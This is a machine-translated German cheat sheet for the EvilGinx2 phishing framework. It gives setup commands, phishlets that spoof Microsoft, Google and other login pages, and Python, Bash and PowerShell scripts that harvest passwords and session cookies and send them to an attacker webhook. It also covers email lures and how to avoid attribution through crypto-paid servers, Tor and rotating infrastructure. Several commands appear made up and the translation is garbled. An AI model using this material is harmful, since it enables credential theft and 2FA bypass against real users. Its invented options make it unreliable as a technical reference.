EvilGinx2 Phishing Framework Cheat Sheet
Überblick
EvilGinx2 ist ein Man-in-the-middle-Angriffsrahmen für fortgeschrittene Phishing-Kampagnen. Es fungiert als umgekehrte Proxy zwischen der Ziel-Website und dem Opfer, so dass Angreifer Anmeldeinformationen, Sitzungs-Cookies und Bypass Zwei-Faktor-Authentifizierung (2FA) erfassen. EvilGinx2 ist besonders effektiv gegen moderne Authentifizierungsmechanismen und bietet Echtzeit-Phishing-Funktionen.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation
Voraussetzungen
```bash
Install Go 1.19+ and Git
sudo apt update sudo apt install -y golang-go git
Verify Go installation
go version
Set Go environment variables
export GOPATH=$HOME/go export PATH=$PATH:$GOPATH/bin ```_
Installation von GitHub
```bash
Clone EvilGinx2 repository
git clone https://github.com/kgretzky/evilginx2.git cd evilginx2
Build EvilGinx2
make
Install to system path
sudo make install
Or run directly
./bin/evilginx ```_
Docker Installation
```bash
Clone repository
git clone https://github.com/kgretzky/evilginx2.git cd evilginx2
Build Docker image
docker build -t evilginx2 .
Run EvilGinx2 container
docker run -it --rm -p 443:443 -p 80:80 -p 53:53/udp evilginx2
Run with persistent data
docker run -it --rm -p 443:443 -p 80:80 -p 53:53/udp -v $(pwd)/data:/app/data evilginx2 ```_
Manuelle Installation
```bash
Download latest release
wget https://github.com/kgretzky/evilginx2/releases/latest/download/evilginx-linux-amd64.tar.gz
Extract and install
tar -xzf evilginx-linux-amd64.tar.gz sudo mv evilginx /usr/local/bin/ sudo chmod +x /usr/local/bin/evilginx ```_
Grundkonfiguration
Erster Setup
```bash
Start EvilGinx2
sudo evilginx
Set domain for phishing
config domain evil.com
Set external IP address
config ip 192.168.1.100
Enable developer mode (for testing)
config dev true
Set redirect URL for successful phishing
config redirect_url https://www.google.com ```_
SSL Zertifikat Konfiguration
```bash
Generate Let's Encrypt certificates (requires valid domain)
config domain phishing.example.com config ip 1.2.3.4 certs
Use custom certificates
config cert_path /path/to/cert.pem config key_path /path/to/key.pem
Self-signed certificates (for testing)
config self_sign true ```_
DNS Konfiguration
```bash
Configure DNS settings
config dns 8.8.8.8
Enable DNS server
config dns_enabled true
Set DNS port
config dns_port 53
Add custom DNS records
dns A phishing.example.com 192.168.1.100 dns A login.phishing.example.com 192.168.1.100 ```_
Phishlets Management
Eingebaute Phishlets
```bash
List available phishlets
phishlets
Show phishlet details
phishlets show [phishlet_name]
Enable phishlet
phishlets enable [phishlet_name]
Disable phishlet
phishlets disable [phishlet_name]
Get phishlet hostname
phishlets hostname [phishlet_name] [hostname] ```_
Beliebte Phishlets
```bash
Microsoft Office 365
phishlets enable o365 phishlets hostname o365 login.microsoftonline.evil.com
phishlets enable google phishlets hostname google accounts.google.evil.com
GitHub
phishlets enable github phishlets hostname github github.evil.com
phishlets enable linkedin phishlets hostname linkedin www.linkedin.evil.com
Amazon
phishlets enable amazon phishlets hostname amazon signin.aws.amazon.evil.com ```_
Kundenspezifische Phishlet-Erstellung
```yaml
Example phishlet configuration (custom.yaml)
name: 'custom' author: '@attacker' min_ver: '2.3.0' proxy_hosts: - \\{phish_sub: 'login', orig_sub: 'login', domain: 'target.com', session: true, is_landing: true\\} sub_filters: - \\{triggers_on: 'login.target.com', orig_sub: 'login', domain: 'target.com', search: 'target.com', replace: 'login.target.evil.com', mimes: ['text/html', 'application/json']\\} auth_tokens: - domain: '.target.com' keys: ['session_token', 'auth_cookie'] auth_urls: - '/login' - '/authenticate' credentials: username: key: 'username' search: '(.)' type: 'post' password: key: 'password' search: '(.)' type: 'post' login: domain: 'target.com' path: '/login' ```_
Benutzerdefinierte Phishlets laden
```bash
Copy phishlet to phishlets directory
cp custom.yaml ~/.evilginx/phishlets/
Reload phishlets
phishlets
Enable custom phishlet
phishlets enable custom phishlets hostname custom login.target.evil.com ```_
Lures und Campaign Management
Leuchten erzeugen
```bash
Create new lure
lures create [phishlet_name]
List all lures
lures
Get lure details
lures get-url [lure_id]
Delete lure
lures delete [lure_id]
Edit lure
lures edit [lure_id] redirect_url https://legitimate-site.com ```_
Lure Konfigurationsoptionen
```bash
Set redirect URL
lures edit [lure_id] redirect_url https://www.google.com
Set user agent filter
lures edit [lure_id] ua_filter "Mozilla/5.0*"
Set IP filter
lures edit [lure_id] ip_filter "192.168.1.0/24"
Set custom parameters
lures edit [lure_id] params "utm_source=email&utm;_campaign=test"
Enable/disable lure
lures edit [lure_id] enabled true lures edit [lure_id] enabled false ```_
Erweiterte Lure Funktionen
```bash
Set custom landing page
lures edit [lure_id] landing_path "/custom-login"
Set session timeout
lures edit [lure_id] session_timeout 3600
Set maximum visits
lures edit [lure_id] max_visits 100
Set geographic restrictions
lures edit [lure_id] geo_filter "US,CA,GB"
Set time-based restrictions
lures edit [lure_id] time_filter "09:00-17:00" ```_
Sitzungsmanagement
Sitzungen anzeigen
```bash
List all captured sessions
sessions
Show session details
sessions [session_id]
Export session data
sessions export [session_id] /path/to/export.json
Delete session
sessions delete [session_id]
Clear all sessions
sessions clear ```_
Analyse der Daten
```bash
View captured credentials
sessions [session_id] creds
View captured cookies
sessions [session_id] cookies
View session timeline
sessions [session_id] timeline
Export cookies for browser import
sessions [session_id] export-cookies /path/to/cookies.txt ```_
Echtzeit-Sitzüberwachung
```bash
Enable real-time notifications
config notifications true
Set notification webhook
config webhook_url https://your-server.com/webhook
Monitor sessions in real-time
tail -f ~/.evilginx/logs/evilginx.log
Custom monitoring script
watch -n 5 'evilginx -c "sessions"|tail -10' ```_
Erweiterte Funktionen
Verkehrssteuerung
```bash
Custom JavaScript injection
config js_inject true config js_file /path/to/custom.js
Custom CSS injection
config css_inject true config css_file /path/to/custom.css
Content replacement rules
config replace_rules /path/to/rules.json
Header manipulation
config custom_headers /path/to/headers.json ```_
Evasion Techniken
```bash
Enable anti-detection features
config anti_detect true
Randomize response timing
config timing_random true
Enable CAPTCHA bypass
config captcha_bypass true
Custom error pages
config error_pages /path/to/error_pages/
Geofencing
config geo_block "CN,RU,KP"
User-Agent filtering
config ua_block "bot,crawler,scanner" ```_
Integration von Funktionen
```bash
Webhook notifications
config webhook_enabled true config webhook_url https://your-server.com/notifications config webhook_secret your_secret_key
Slack integration
config slack_webhook https://hooks.slack.com/services/YOUR/SLACK/WEBHOOK
Email notifications
config smtp_server smtp.gmail.com:587 config smtp_username your_email@gmail.com config smtp_password your_app_password config notification_email admin@your-domain.com ```_
Automatisierung und Schrift
Python Automation Script
```python
!/usr/bin/env python3
EvilGinx2 automation script
import subprocess import json import time import requests from datetime import datetime
class EvilGinxAutomation: def init(self, domain, ip_address): self.domain = domain self.ip_address = ip_address self.webhook_url = None
def setup_evilginx(self):
"""Initial EvilGinx2 setup"""
commands = [
f"config domain \\\\{self.domain\\\\}",
f"config ip \\\\{self.ip_address\\\\}",
"config dev false",
"config redirect_url https://www.google.com",
"certs"
]
for cmd in commands:
self.execute_command(cmd)
time.sleep(2)
def execute_command(self, command):
"""Execute EvilGinx2 command"""
try:
result = subprocess.run([
"evilginx", "-c", command
], capture_output=True, text=True, timeout=30)
return result.stdout
except subprocess.TimeoutExpired:
return "Command timed out"
except Exception as e:
return f"Error: \\\\{str(e)\\\\}"
def setup_phishlet(self, phishlet_name, hostname):
"""Setup and enable phishlet"""
commands = [
f"phishlets enable \\\\{phishlet_name\\\\}",
f"phishlets hostname \\\\{phishlet_name\\\\} \\\\{hostname\\\\}"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(1)
return True
def create_lure(self, phishlet_name, redirect_url=None):
"""Create phishing lure"""
cmd = f"lures create \\\\{phishlet_name\\\\}"
result = self.execute_command(cmd)
# Extract lure ID from result
lure_id = self.extract_lure_id(result)
if redirect_url and lure_id:
self.execute_command(f"lures edit \\\\{lure_id\\\\} redirect_url \\\\{redirect_url\\\\}")
return lure_id
def extract_lure_id(self, output):
"""Extract lure ID from command output"""
# Parse output to extract lure ID
# Implementation depends on EvilGinx2 output format
lines = output.split('\n')
for line in lines:
if 'lure' in line.lower() and 'id' in line.lower():
# Extract ID using regex or string parsing
import re
match = re.search(r'id:\s*(\d+)', line)
if match:
return match.group(1)
return None
def get_lure_url(self, lure_id):
"""Get phishing URL for lure"""
result = self.execute_command(f"lures get-url \\\\{lure_id\\\\}")
# Parse URL from result
lines = result.split('\n')
for line in lines:
if 'http' in line:
return line.strip()
return None
def monitor_sessions(self):
"""Monitor captured sessions"""
while True:
result = self.execute_command("sessions")
sessions = self.parse_sessions(result)
for session in sessions:
if session.get('new', False):
self.handle_new_session(session)
time.sleep(10)
def parse_sessions(self, output):
"""Parse sessions from command output"""
# Implementation depends on EvilGinx2 output format
sessions = []
lines = output.split('\n')
for line in lines:
if 'session' in line.lower():
# Parse session data
session_data = \\\\{
'id': 'extracted_id',
'timestamp': datetime.now(),
'new': True # Logic to determine if session is new
\\\\}
sessions.append(session_data)
return sessions
def handle_new_session(self, session):
"""Handle new captured session"""
print(f"[+] New session captured: \\\\{session['id']\\\\}")
# Get session details
session_details = self.execute_command(f"sessions \\\\{session['id']\\\\}")
# Send notification
if self.webhook_url:
self.send_webhook_notification(session, session_details)
# Export session data
self.export_session(session['id'])
def send_webhook_notification(self, session, details):
"""Send webhook notification for new session"""
payload = \\\\{
'session_id': session['id'],
'timestamp': session['timestamp'].isoformat(),
'details': details
\\\\}
try:
response = requests.post(self.webhook_url, json=payload, timeout=10)
if response.status_code == 200:
print("[+] Webhook notification sent")
else:
print(f"[-] Webhook failed: \\\\{response.status_code\\\\}")
except Exception as e:
print(f"[-] Webhook error: \\\\{str(e)\\\\}")
def export_session(self, session_id):
"""Export session data"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
export_path = f"/tmp/session_\\\\{session_id\\\\}_\\\\{timestamp\\\\}.json"
self.execute_command(f"sessions export \\\\{session_id\\\\} \\\\{export_path\\\\}")
print(f"[+] Session exported to: \\\\{export_path\\\\}")
def setup_campaign(self, campaign_config):
"""Setup complete phishing campaign"""
print("[+] Setting up EvilGinx2 campaign...")
# Initial setup
self.setup_evilginx()
# Setup phishlets
for phishlet in campaign_config.get('phishlets', []):
self.setup_phishlet(phishlet['name'], phishlet['hostname'])
# Create lures
for lure_config in phishlet.get('lures', []):
lure_id = self.create_lure(phishlet['name'], lure_config.get('redirect_url'))
if lure_id:
lure_url = self.get_lure_url(lure_id)
print(f"[+] Lure created: \\\\{lure_url\\\\}")
print("[+] Campaign setup complete")
Usage example
def main(): # Campaign configuration campaign_config = \\{ 'phishlets': [ \\{ 'name': 'o365', 'hostname': 'login.microsoftonline.evil.com', 'lures': [ \\{'redirect_url': 'https://office.com'\\}, \\{'redirect_url': 'https://outlook.com'\\} ] \\}, \\{ 'name': 'google', 'hostname': 'accounts.google.evil.com', 'lures': [ \\{'redirect_url': 'https://gmail.com'\\} ] \\} ] \\}
# Initialize automation
automation = EvilGinxAutomation("evil.com", "192.168.1.100")
automation.webhook_url = "https://your-server.com/webhook"
# Setup campaign
automation.setup_campaign(campaign_config)
# Start monitoring
automation.monitor_sessions()
if name == "main": main() ```_
Bash Automation Script
```bash
!/bin/bash
EvilGinx2 bash automation script
DOMAIN="evil.com" IP_ADDRESS="192.168.1.100" PHISHLET="o365" HOSTNAME="login.microsoftonline.evil.com"
Function to execute EvilGinx2 commands
execute_evilginx_command() \\{ local command="$1" echo "[+] Executing: $command" evilginx -c "$command" sleep 2 \\}
Initial setup
echo "[+] Setting up EvilGinx2..." execute_evilginx_command "config domain $DOMAIN" execute_evilginx_command "config ip $IP_ADDRESS" execute_evilginx_command "config dev false" execute_evilginx_command "config redirect_url https://www.google.com" execute_evilginx_command "certs"
Setup phishlet
echo "[+] Setting up phishlet: $PHISHLET" execute_evilginx_command "phishlets enable $PHISHLET" execute_evilginx_command "phishlets hostname $PHISHLET $HOSTNAME"
Create lure
echo "[+] Creating lure..." LURE_OUTPUT=$(evilginx -c "lures create $PHISHLET") LURE_ID=$(echo "$LURE_OUTPUT"|grep -oP 'id:\s*\K\d+')
if [ -n "$LURE_ID" ]; then echo "[+] Lure created with ID: $LURE_ID"
# Configure lure
execute_evilginx_command "lures edit $LURE_ID redirect_url https://office.com"
# Get lure URL
LURE_URL=$(evilginx -c "lures get-url $LURE_ID"|grep -oP 'https?://[^\s]+')
echo "[+] Phishing URL: $LURE_URL"
else echo "[-] Failed to create lure" exit 1 fi
Monitor sessions
echo "[+] Starting session monitoring..." while true; do SESSIONS=$(evilginx -c "sessions"|grep -c "session") if [ "$SESSIONS" -gt 0 ]; then echo "[+] $SESSIONS session(s) captured"
# Export latest session
| LATEST_SESSION=$(evilginx -c "sessions" | tail -1 | awk '\\{print $1\\}') | if [ -n "$LATEST_SESSION" ]; then TIMESTAMP=$(date +"%Y%m%d_%H%M%S") evilginx -c "sessions export $LATEST_SESSION /tmp/session_$\\{LATEST_SESSION\\}$\\{TIMESTAMP\\}.json" echo "[+] Session exported: /tmp/session$\\{LATEST_SESSION\\}_$\\{TIMESTAMP\\}.json" fi fi
sleep 30
done ```_
PowerShell Automation
```powershell
EvilGinx2 PowerShell automation script
function Invoke-EvilGinxAutomation \\{ param( [string]$Domain = "evil.com", [string]$IPAddress = "192.168.1.100", [string]$Phishlet = "o365", [string]$Hostname = "login.microsoftonline.evil.com" )
function Execute-EvilGinxCommand \\\\{
param([string]$Command)
Write-Host "[+] Executing: $Command"
try \\\\{
$result = & evilginx -c $Command 2>&1
Start-Sleep -Seconds 2
return $result
\\\\}
catch \\\\{
Write-Warning "Failed to execute command: $Command"
return $null
\\\\}
\\\\}
# Initial setup
Write-Host "[+] Setting up EvilGinx2..."
Execute-EvilGinxCommand "config domain $Domain"
Execute-EvilGinxCommand "config ip $IPAddress"
Execute-EvilGinxCommand "config dev false"
Execute-EvilGinxCommand "config redirect_url https://www.google.com"
Execute-EvilGinxCommand "certs"
# Setup phishlet
Write-Host "[+] Setting up phishlet: $Phishlet"
Execute-EvilGinxCommand "phishlets enable $Phishlet"
Execute-EvilGinxCommand "phishlets hostname $Phishlet $Hostname"
# Create lure
Write-Host "[+] Creating lure..."
$lureOutput = Execute-EvilGinxCommand "lures create $Phishlet"
if ($lureOutput -match 'id:\s*(\d+)') \\\\{
$lureId = $matches[1]
Write-Host "[+] Lure created with ID: $lureId"
# Configure lure
Execute-EvilGinxCommand "lures edit $lureId redirect_url https://office.com"
# Get lure URL
$lureUrlOutput = Execute-EvilGinxCommand "lures get-url $lureId"
if ($lureUrlOutput -match '(https?://[^\s]+)') \\\\{
$lureUrl = $matches[1]
Write-Host "[+] Phishing URL: $lureUrl"
\\\\}
\\\\}
else \\\\{
Write-Error "Failed to create lure"
return
\\\\}
# Monitor sessions
Write-Host "[+] Starting session monitoring..."
while ($true) \\\\{
$sessionsOutput = Execute-EvilGinxCommand "sessions"
$sessionCount = ($sessionsOutput|Select-String "session").Count
if ($sessionCount -gt 0) \\\\{
Write-Host "[+] $sessionCount session(s) captured"
# Export latest session
$sessions = $sessionsOutput -split "`n"|Where-Object \\{ $_ -match "session" \\}
if ($sessions.Count -gt 0) \\{
$latestSession = ($sessions[-1] -split '\s+')[0]
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$exportPath = "/tmp/session_$\\{latestSession\\}_$\\{timestamp\\}.json"
Execute-EvilGinxCommand "sessions export $latestSession $exportPath"
Write-Host "[+] Session exported: $exportPath"
\\}
\\}
Start-Sleep -Seconds 30
\\}
\}
Execute automation
Invoke-EvilGinxAutomation -Domain "evil.com" -IPAddress "192.168.1.100" ```_
Integration mit anderen Tools
Metasploit Integration
```bash
Use EvilGinx2 for credential harvesting, pivot to Metasploit
After capturing credentials, use them in Metasploit modules
Example: Use captured O365 credentials
use auxiliary/scanner/http/office365_login set USERNAME captured_username@company.com set PASSWORD captured_password set RHOSTS company-mail.outlook.com run
Use captured session cookies in browser automation
use auxiliary/scanner/http/cookie_replay set COOKIE "captured_session_cookie" set RHOSTS target.com run ```_
Social Engineering Toolkit Integration
```bash
Combine with SET for comprehensive campaigns
Use EvilGinx2 for credential harvesting
Use SET for payload delivery
Generate SET payload
setoolkit
Select Social-Engineering Attacks
Select Website Attack Vectors
Select Credential Harvester Attack Method
Use custom EvilGinx2 URL as redirect
```_
GoPhys Integration
```bash
Use GoPhish for email delivery
Use EvilGinx2 for credential harvesting
GoPhish campaign configuration
\{ "name": "O365 Campaign", "template": \{ "name": "O365 Login Required", "subject": "Action Required: Verify Your Account", "html": "Click here to verify" \}, "url": "https://login.microsoftonline.evil.com/lure_url" \} ```_
Operationelle Sicherheit
Domain und Infrastruktur
```bash
Use legitimate-looking domains
Register domains with privacy protection
Use cloud hosting providers
Implement CDN for traffic distribution
Example domain registration
Register: microsoftonline-security.com
Setup: login.microsoftonline-security.com
SSL: Let's Encrypt or commercial certificate
```_
Verkehrsobfukation
```bash
Enable anti-detection features
config anti_detect true
Use legitimate SSL certificates
config cert_path /path/to/legitimate/cert.pem
Implement geographic restrictions
config geo_block "high_risk_countries"
Use realistic timing delays
config timing_random true config min_delay 500 config max_delay 2000 ```_
Verwaltung
```bash
Configure secure logging
config log_file /var/log/evilginx/access.log config log_level info
Implement log rotation
logrotate /etc/logrotate.d/evilginx
Secure log storage
Encrypt logs at rest
Use remote log aggregation
Implement log retention policies
```_
Beitragsvorbeugung
```bash
Use VPS with cryptocurrency payment
Implement proxy chains
Use Tor for administrative access
Regularly rotate infrastructure
Example infrastructure rotation
Week 1: VPS Provider A, Domain Set 1
Week 2: VPS Provider B, Domain Set 2
Week 3: VPS Provider C, Domain Set 3
```_
Fehlerbehebung
Gemeinsame Themen
```bash
Certificate issues
Check domain DNS configuration
Verify Let's Encrypt rate limits
Test certificate validity
DNS resolution problems
Check DNS server configuration
Verify domain propagation
Test with different DNS resolvers
Phishlet not working
Check phishlet syntax
Verify target website changes
Test with different browsers
```_
Debug Mode
```bash
Enable debug logging
config debug true config log_level debug
Test phishlet functionality
phishlets test [phishlet_name]
Check network connectivity
curl -I https://your-phishing-domain.com
Verify SSL configuration
openssl s_client -connect your-domain.com:443 ```_
Leistungsoptimierung
```bash
Optimize for high traffic
config max_connections 1000 config timeout 30
Enable caching
config cache_enabled true config cache_size 100MB
Monitor resource usage
htop iotop netstat -tulpn ```_
Best Practices
Kampagnenplanung
- Zielforschung: Zielorganisation und Nutzer verstehen
- Domain Auswahl: Wählen Sie überzeugende Domainnamen
- *Infrastruktur-Setup: Verwenden Sie sicheres und anonymes Hosting
- Testing: Phishing-Seiten vor dem Einsatz gründlich testen
- Monitoring: Implementierung der Echtzeit-Sitzungsüberwachung
Rechtliche und ethische Überlegungen
```bash
Authorized testing only
Obtain proper written authorization
Follow responsible disclosure
Protect captured data
Document all activities
Example authorization checklist
[ ] Written penetration testing agreement
[ ] Scope clearly defined
[ ] Data handling procedures established
[ ] Incident response plan in place
[ ] Legal review completed
```_
Datenschutz
```bash
Encrypt captured data
Implement secure data storage
Use secure communication channels
Regular data purging
Access control and auditing
Example data encryption
gpg --cipher-algo AES256 --compress-algo 1 --symmetric --output session_data.gpg session_data.json ```_
Ressourcen
- EvilGinx2 GitHub Repository
- EvilGinx2 Dokumentation
- (__LINK_5___)
- [OWASP Phishing Guide](LINK_5
- [Anti-Phishing-Arbeitsgruppe](_LINK_5__
--
*Dieses Betrugsblatt bietet eine umfassende Referenz für die Verwendung von EvilGinx2 Phishing-Rahmen. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung haben, bevor Sie Phishing-Simulationen oder Penetrationstests durchführen. *